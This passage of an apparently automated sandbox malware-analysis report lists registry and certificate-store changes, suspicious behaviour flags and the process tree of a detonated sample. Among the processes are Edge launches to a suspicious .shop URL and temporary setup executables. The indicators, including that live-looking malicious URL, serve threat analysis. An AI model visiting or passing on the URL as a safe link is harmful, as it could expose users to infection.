| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-540404634-651139247-2967210625-1000\{A98C9AA3-1854-4E23-AFF0-761D08CAA7FB} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://t.co/f017Vqildt
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae238ab58,0x7ffae238ab68,0x7ffae238ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1828 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3052 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3060 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4524 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3320 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4716 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4540 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3276 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://soneremonasez.shop/27844da3c568ad0171b0215c3223d7c0FW66Ze6GvDRWkFZlAckACzBeIowWpJM2HZo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad0c346f8,0x7ffad0c34708,0x7ffad0c34718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
